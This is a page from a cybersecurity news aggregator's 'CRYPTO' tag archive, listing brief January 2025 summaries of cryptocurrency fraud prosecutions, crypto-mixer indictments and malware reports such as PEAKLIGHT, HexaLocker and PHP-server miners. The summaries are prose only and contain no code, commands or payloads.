CRYPTO – Page 2 – Cybersecurity News Everyday

Weekly Cybersecurity Roundup: January 6, 2025 – January 12, 2025

January 13, 2025 iocOne

This article provides a comprehensive overview of significant cybersecurity incidents and vulnerabilities reported recently, including outages, data breaches, and exploits targeting various platforms. Affected: Proton Mail, Ivanti VPN, Banshee, BayMark Health Services, Medusind, MirrorFace, STIIIZY, Samsung, GFI KerioControl, Mitel MiCollab, CrowdStrike, Akamai, Casio.

Keypoints :

Proton Mail experienced a worldwide outage due to a surge in database connections during infrastructure migration.…

Cyber Security News

Pastor who saw crypto project in his “dream” indicted for fraud

January 12, 2025 BleepingComputer

Summary: A pastor in Pasco, Washington, has been indicted on 26 counts of fraud for allegedly running a cryptocurrency scam that defrauded investors of millions. He misused his position to promote a fake investment venture called “Solano Fi,” promising guaranteed returns while diverting funds for personal use.…

Threat Research

PEAKLIGHT: Illuminating the Shadows

January 11, 2025 Securonix

PEAKLIGHT is an obfuscated PowerShell downloader identified by Mandiant that delivers malware-as-a-service infostealers through Microsoft Shortcut Files. It utilizes a JavaScript dropper hosted on a CDN to execute malicious payloads, including LummaC2, HijackLoader, and CryptBot. The campaign highlights the use of legitimate tools for malware delivery while evading detection.…

Cyber Security News

DoJ Indicts Three Russians for Operating Crypto Mixers Used in Cybercrime Laundering

January 11, 2025 TheHackerNews

Summary: The U.S. Department of Justice has indicted three Russian nationals for their roles in operating cryptocurrency mixing services Blender.io and Sinbad.io, which were allegedly used for laundering criminal funds. The mixers facilitated transactions that obscured the origins of funds linked to various cyber crimes, including ransomware and wire fraud.…

Info Data Leak

Cybersecurity News Review Week 2

January 11, 2025January 18, 2025 admin

This article discusses recent significant developments in cybersecurity, including vulnerabilities in Ivanti products, phishing scams, data exposure issues, and new government initiatives aimed at improving cyber resilience. Affected: Ivanti Connect Secure, CrowdStrike, Motorola ALPR, Gmail, WordPress, CISA, UK Government

Keypoints :

Ivanti disclosed two high-severity vulnerabilities (CVE-2025–0282, CVE-2025–0283) affecting its products.…

Cyber Security News

New York sues to recover us2 million in crypto stolen in remote job scams

January 11, 2025January 11, 2025 RecordedFuture

Summary: New York’s attorney general is pursuing over $2 million in cryptocurrency stolen through a remote job scam that deceived victims into investing in fake job opportunities. The investigation, in collaboration with the U.S. Secret Service, aims to recover the funds and penalize the scammers involved in the fraudulent scheme.…

Cyber Security News

Russian nationals arrested by US, accused of running crypto mixers Blender and Sinbad

January 11, 2025 RecordedFuture

Summary: Three Russian nationals have been indicted for their involvement in operating cryptocurrency mixing services Blender.io and Sinbad.io, which were used to launder funds for cybercriminals, including North Korea’s Lazarus Group. The U.S. Department of Justice, in collaboration with international law enforcement, has taken significant steps to dismantle these platforms and hold the operators accountable.…

Cyber Security News

US charges operators of cryptomixers linked to ransomware gangs

January 11, 2025 BleepingComputer

Summary: The U.S. Department of Justice has indicted three operators of Blender.io and Sinbad.io, crypto mixer services linked to ransomware and North Korean hackers, for money laundering and operating without a license. These mixers facilitated the laundering of stolen cryptocurrency, impacting public safety and national security.…

Cyber Security News

New Web3 attack exploits transaction simulations to steal crypto

January 11, 2025 BleepingComputer

Summary: Threat actors are utilizing a new tactic known as “transaction simulation spoofing” to steal cryptocurrency, successfully executing an attack that resulted in the theft of 143.45 Ethereum, valued at around $460,000. This method exploits flaws in transaction simulation mechanisms in Web3 wallets, which are intended to protect users from fraudulent activities.…

Threat Research

Stealthy Credit Card Skimmer Targets WordPress Checkout Pages via Database Injection

January 10, 2025 Sucuri

This article discusses a sophisticated credit card skimmer malware targeting WordPress websites, which injects malicious JavaScript into database entries to steal payment information during checkout. The malware operates silently and avoids detection by embedding itself in the WordPress database. Affected: WordPress

Keypoints :

Credit card skimmer malware targets checkout pages on WordPress sites.…

Threat Research

HexaLocker V2: Skuld Stealer Paving the Way prior to Encryption

January 10, 2025 Cyble

HexaLocker V2 is a newly updated ransomware variant that incorporates advanced functionalities such as a persistence mechanism, a data exfiltration process using Skuld Stealer, and enhanced encryption methods. The ransomware targets Windows systems, employing a double extortion tactic by stealing and encrypting files. Affected: HexaLocker, Skuld Stealer

Keypoints :

HexaLocker was first discovered in mid-2024, with version 2 introducing significant updates.…

Trash

PacketCrypt Classic Cryptocurrency Miner on PHP Servers – SANS Internet Storm Center

January 10, 2025January 10, 2025 Securonix

The article discusses a security analysis of a malicious URL that exploits vulnerable PHP servers to download and execute cryptocurrency mining software. The investigation reveals the use of specific executables and their associated hashes, as well as the identification of a wallet address linked to the mining activity.…

Cyber Security News

Fake CrowdStrike job offer emails target devs with crypto miners

January 10, 2025 BleepingComputer

Summary: CrowdStrike has identified a phishing campaign that impersonates the company, targeting job seekers with fake job offer emails to distribute a Monero cryptocurrency miner. The campaign tricks victims into downloading a malicious application disguised as an employee CRM tool.

Threat Actor: Unknown | unknown Victim: Job Seekers | job seekers

Key Point :

Phishing emails impersonate CrowdStrike, thanking candidates for applying for a developer position.…

Trash

The Feed 2025-01-09

January 9, 2025January 9, 2025 admin

This article explores various cyber threats, including voice phishing by the “Crypto Chameleon” group, exploitation of vulnerabilities in Kerio Control and Ivanti Connect Secure VPN, and North Korean hackers targeting cryptocurrency wallets through fake job interviews. The rise of ransomware among state-sponsored APT groups is also highlighted, indicating a troubling trend in modern cyber threats.…

Threat Research

Examining Redtail Analyzing a Sophisticated Cryptomining Malware and its Advanced Tactics Guest Diary – SANS Internet Storm Center

January 9, 2025 admin

This article discusses the redtail cryptocurrency mining malware, detailing its execution methods, the threat actors behind it, and the implications for cybersecurity. The analysis highlights the malware’s ability to adapt and exploit vulnerabilities, emphasizing the need for robust protective measures against such threats. Affected: honeypot, Palo Alto Networks’ PAN-OS

Keypoints :

redtail is a cryptocurrency mining malware that stealthily installs itself on compromised systems.…

Threat Research

Zero Day Initiative – ZDI Threat Hunting 2024 Highlights Trends and Challenges

January 9, 2025January 9, 2025 admin

The Zero Day Initiative Threat Hunting team had a productive 2024, identifying numerous zero-day vulnerabilities and their exploitation by threat actors. The team highlighted key achievements and ongoing challenges in vulnerability management, emphasizing the need for prompt and comprehensive patching solutions. Affected: Microsoft, Dropbox

Keypoints :

The ZDI Threat Hunting team identified multiple zero-day vulnerabilities exploited in the wild during 2024.…

Trash

ZDI Threat Hunting 2024 Highlights Trends and Challenges

January 9, 2025January 9, 2025 admin

In 2024, the Zero Day Initiative Threat Hunting team made significant strides in identifying and addressing zero-day vulnerabilities, highlighting the challenges of narrow patching and the rise of sophisticated phishing attacks. This blog outlines key achievements and trends, emphasizing the importance of proactive threat hunting and collaboration with software vendors.…

Info Data Leak

Cyber Briefing: January 8, 2025

January 8, 2025January 18, 2025 admin

This article discusses the latest trends in cybersecurity, including the Mirai botnet exploiting vulnerabilities in Four-Faith routers, critical flaws in Mitel and Oracle systems, and various cyber incidents such as data breaches at Green Bay Packers and Casio. It also highlights the launch of the U.S.…

Threat Research

PHP Servers Vulnerability Exploited to Inject PacketCrypt Cryptocurrency Miner

January 8, 2025January 8, 2025 admin

Researchers have identified a URL that exploits a server-side vulnerability in PHP scripts, allowing attackers to download and execute malicious executables. The malware, dr0p.exe, subsequently downloads pkt1.exe, which acts as a cryptocurrency miner, targeting vulnerable PHP servers. This incident emphasizes the importance of regular security updates to mitigate such threats.…

Info Data Leak

Cyber Briefing: January 7, 2025

January 7, 2025January 18, 2025 admin

This article discusses various recent cyber threats and incidents, including advanced backdoor attacks targeting AI models, data-stealing plugins, critical vulnerabilities in routers, and cyber espionage campaigns. It highlights the need for vigilance and updated security measures across multiple sectors. Affected Platform: Android, WordPress, Discord, various routers, telecommunications companies

Keypoints :

BARWM is a new backdoor attack method targeting deep learning models on mobile devices.…

Tag: CRYPTO